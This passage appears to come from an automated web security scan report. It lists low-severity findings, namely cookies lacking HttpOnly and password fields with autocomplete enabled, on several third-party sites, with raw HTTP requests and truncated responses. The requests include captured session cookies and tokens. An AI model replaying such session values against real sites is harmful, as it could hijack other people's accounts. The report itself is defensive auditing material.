Expires: Fri, 07 May 2021 01:01:09 GMT
Date: Sat, 07 May 2011 01:01:09 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:09 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:09 GMT; Path=/
Content-Length: 59679


(function($){$.fn.selectAllCheckboxes=function(settings){var options=$.extend({formName:null,keepCheckedByValue:null,keepCheckedByIndex:null},settings||{});return this.each(function(){var $input=$(th
...[SNIP]...
18.286. http://www.networksolutions.com/js/gzip_N1866293226/bundles/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N1866293226/bundles/omniture.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/gzip_N1866293226/bundles/omniture.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; vertigo=false; currency=USD

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:10 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Fri, 07 May 2021 01:01:10 GMT
Date: Sat, 07 May 2011 01:01:10 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:10 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:10 GMT; Path=/
Content-Length: 41662


if(typeof(s_account)=="undefined"){var fld=document.getElementById('omnitureInfo');if(fld==null){alert("Could not locate Omniture Info");}
var regex=/s_account=\'([a-zA-Z0-9\-\+]+)\'\[\|\]/;var found
...[SNIP]...
18.287. https://www.paypal.com/en_US/i/btn/btn_xpressCheckout.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /en_US/i/btn/btn_xpressCheckout.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/i/btn/btn_xpressCheckout.gif HTTP/1.1
Host: www.paypal.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:08 GMT
Server: Apache
Set-Cookie: Apache=10.191.114.122.1304729768396297; path=/; expires=Mon, 29-Apr-41 00:56:08 GMT
Last-Modified: Tue, 23 Oct 2007 03:08:13 GMT
Accept-Ranges: bytes
Content-Length: 3091
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..*....OXS........{...........:......................+..............6.:b...........E................................ax....o....j...........9........O..\......................d....../Tu.......
...[SNIP]...
19. Password field with autocomplete enabled  previous  next
There are 31 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

19.1. http://hmficweb.hinghammutual.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/billingview.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okh4joycosvncyichzumbi3a; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17204

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<body class="home" onload="funLoadAgencyLocator();">
       <form name="Form1" method="post" action="https://localhost/hingham.default.aspx" id="Form1">
<div>
...[SNIP]...
<br>
                                   <input name="txtPassword" type="password" id="txtPassword" class="textbox" /></div>
...[SNIP]...
19.2. http://hmficweb.hinghammutual.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17204

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<body class="home" onload="funLoadAgencyLocator();">
       <form name="Form1" method="post" action="https://localhost/hingham.default.aspx" id="Form1">
<div>
...[SNIP]...
<br>
                                   <input name="txtPassword" type="password" id="txtPassword" class="textbox" /></div>
...[SNIP]...
19.3. http://hmficweb.hinghammutual.com/reglogin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /reglogin.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /reglogin.aspx?F=Y HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/default.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<body class="login" onload="Form1.txtUsername.focus();">
       <form name="Form1" method="post" action="reglogin.aspx?F=Y" onsubmit="javascript:return WebForm_OnSubmit();" id="Form1">
<div>
...[SNIP]...
<div class="formField">
                                           <input name="txtPassword" type="password" id="txtPassword" class="textbox" />
                                       </div>
...[SNIP]...
19.4. http://hmficweb.hinghammutual.com/reglogin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /reglogin.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /reglogin.aspx?ReturnUrl=%2fadmin%2fDefault.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/admin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:47:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7581


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<body class="login" onload="Form1.txtUsername.focus();">
       <form name="Form1" method="post" action="reglogin.aspx?ReturnUrl=%2fadmin%2fDefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="Form1">
<div>
...[SNIP]...
<div class="formField">
                                           <input name="txtPassword" type="password" id="txtPassword" class="textbox" />
                                       </div>
...[SNIP]...
19.5. http://hmficweb.hinghammutual.com/reglogin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /reglogin.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /reglogin.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7626


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<body class="login" onload="Form1.txtUsername.focus();">
       <form name="Form1" method="post" action="reglogin.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="Form1">
<div>
...[SNIP]...
<div class="formField">
                                           <input name="txtPassword" type="password" id="txtPassword" class="textbox" />
                                       </div>
...[SNIP]...
19.6. http://login.vindicosuite.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=ALNPJKACIDHPPEIGPANPDPFM; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:30:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<div class = "loggedInAs">
       
           <form method="POST" action="vindico_dynamic.asp" name = "MainForm">
               <table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
...[SNIP]...
<td width="183" height="25"><input type="password" name="password" size="8"></td>
...[SNIP]...
19.7. http://login.vindicosuite.com/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2294
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<div class = "loggedInAs">
       
           <form method="POST" action="vindico_dynamic.asp" name = "MainForm">
               <table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
...[SNIP]...
<td width="183" height="25"><input type="password" name="password" size="8"></td>
...[SNIP]...
19.8. https://mosaicsecurity.com/products/1919-pci-scan-annual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mosaicsecurity.com
Path:   /products/1919-pci-scan-annual

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/1919-pci-scan-annual HTTP/1.1
Host: mosaicsecurity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
Strict-Transport-Security: max-age=31536000
ETag: "e65d65d16df32bda93928296ee041e60"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
Set-Cookie: _mosaic_secure_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRiIlZGEyYzY1ODVkOWIwYzE2YjI1ZmQ2ZGJiZTNkMWM0ODRJIhBfY3NyZl90b2tlbgY7AEZJIjF5ZTdRVnRDKzh2cVJKNWJVellUSEorSDAxMHRjYndyMzJPcklMbUZBRTRJPQY7AEY%3D--eedc6cf89468d42842b46738353515c9084092d3; path=/; HttpOnly; secure
X-Runtime: 0.031145
Server: nginx/0.8.53 + Phusion Passenger 3.0.2 (mod_rails/mod_rack)
Content-Length: 13341

<!DOCTYPE html>
<html>
<head>
<title>PCI Scan Annual Software Guide | Mosaic Security Research</title>
<meta name="description" content="Mosaic Security is an independent online buyer...s guide fo
...[SNIP]...
</h3>
<form accept-charset="UTF-8" action="/session" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label><input class="text-input password-input" id="footer_password" name="password" type="password" value="" /></li>
...[SNIP]...
19.9. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
lid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br />
...[SNIP]...
<td>
<input id="txtPassword" name="txtPassword" type="password" value="" style="width: 200px" onblur="validatePresent(this,'msg_pass');" /> </td>
...[SNIP]...
19.10. https://secure.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:39:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
lid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br />
...[SNIP]...
<td>
<input id="txtPassword" name="txtPassword" type="password" value="" style="width: 200px" onblur="validatePresent(this,'msg_pass');" /> </td>
...[SNIP]...
19.11. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tbe.taleo.net
Path:   /NA9/ats/careers/jobSearch.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /NA9/ats/careers/jobSearch.jsp?org=BT&cws=1&__utma=1.2052460901.1304724283.1304724283.1304724283.1&__utmb=1.1.10.1304724283&__utmc=1&__utmx=-&__utmz=1.1304724283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)&__utmv=-&__utmk=178642980 HTTP/1.1
Host: tbe.taleo.net
Proxy-Connection: keep-alive
Referer: http://www.btamericascareers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:24:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=69BC8F52CA8219FC1D3E62420D8128B6.NA9_primary_jvm; Path=/NA9/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Content-Length: 27234


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHT
...[SNIP]...
<tr>
<form action='https://tbe.taleo.net/NA9/ats/careers/applicantView.jsp?org=BT&cws=1' method='post' name='loginForm'>
<input type='hidden' name='org' value='BT'>
...[SNIP]...
<td nowrap colspan=1><input tabIndex='38' type='password' name='cwsPassword' maxlength=50 size=40></td>
...[SNIP]...
19.12. http://www.advisorsquare.com/useradmin/Authenticate.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2145
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=OOBHGKOBOBCFHHIMIHNKOOLC; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:43 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
       <div align="center">
...[SNIP]...
<td BGCOLOR="#5b5b5a"><input type="Password" name="Password"></td>
...[SNIP]...
19.13. http://www.alumniconnections.com/alumni_members/mylisting/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.alumniconnections.com
Path:   /alumni_members/mylisting/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /alumni_members/mylisting/index.html HTTP/1.1
Host: www.alumniconnections.com
Proxy-Connection: keep-alive
Referer: http://www.harrisconnect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 17:29:33 GMT
Content-type: text/html
Last-modified: Thu, 30 Apr 2009 03:01:15 GMT
Content-length: 8178
Etag: "1ff2-49f9147b"
Accept-ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</p>
                           <form action="olq_redirect.cgi" method="post" Name="OLQId" onSubmit="return checkField();">
                               <fieldset>
...[SNIP]...
</label> <input type="password" name="pass" size="14" maxlength="20"></li>
...[SNIP]...
19.14. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</p>

                               <form action="#" id="LoginForm" method="post" onsubmit="ExpressCheckout.Login(); return false;">
                                   <div class="FormContainer HorizontalFormContainer NarrowFormContainer">
...[SNIP]...
<dd><input type="password" class="Textbox Field150" name="login_pass" id="login_pass" /></dd>
...[SNIP]...
19.15. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
